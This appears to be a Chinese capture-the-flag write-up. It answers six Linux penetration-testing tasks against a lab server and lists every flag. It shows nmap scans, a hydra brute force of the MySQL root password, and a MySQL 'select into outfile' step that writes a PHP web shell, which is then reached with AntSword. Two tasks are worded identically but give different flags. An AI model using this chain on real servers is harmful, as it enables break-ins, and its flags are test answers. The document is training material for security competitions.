Linux 操作系统渗透测试

1.通过Kali对服务器场景Linux进行操作系统扫描渗透测试,并将该操作显示结果“OS Details:”之后的字符串作为Flag提交;

image-20221010134045561

nmap -A -Pn -T5 172.16.102.250

扫描目标地址即可得到

Flag:Linux 2.6.32 - 3.10

2.通过Kali对服务器场景Linux进行系统服务及版本扫描渗透测试,并将该操作显示结果中MySQL数据库对应的服务版本信息字符串作为Flag提交;

image-20221010134228602

nmap -A -Pn -T5 172.16.102.250

扫描即可得出

Flag: MySQL 5.1.73-log

3.通过Kali对服务器场景Linux进行渗透测试,将该场景/var/www/html目录中唯一一个后缀为.html文件的文件名称作为Flag提交;

image-20221010135311930

hydra -l root -P /root/200.txt mysql://172.16.102.250

由上题可以得知他数据库的版本5.1.73 这个低版本的数据库是可以通过数据库写码的

通过hydra爆破出他数据库的账号密码 root 3112ab

mysql -h 172.16.102.250 -u root -p

image-20221010135725120

登录数据库

select ““into outfile “/var/www/html/123.php”

写入一句话木马image-20221010135948121

image-20221010140124613

通过蚁剑连接一句话木马image-20221010140248450

找到文件

Flag: loginmanager

4.通过Kali对服务器场景Linux进行渗透测试,将该场景/var/www/html目录中唯一一个后缀为.html文件的文件名称作为Flag提交;

image-20221010140430809

Flag: slkrvung

5.通过Kali对服务器场景Linux进行渗透测试,将该场景/root目录中唯一一个后缀为.bmp文件的文件名称作为Flag提交;

image-20221010140609361

Flag: vmifeo

6.通过Kali对服务器场景Linux进行渗透测试,将该场景/root目录中唯一一个后缀为.bmp的图片文件中的英文单词作为Flag提交。

image-20221010140703448

Flag: glamorous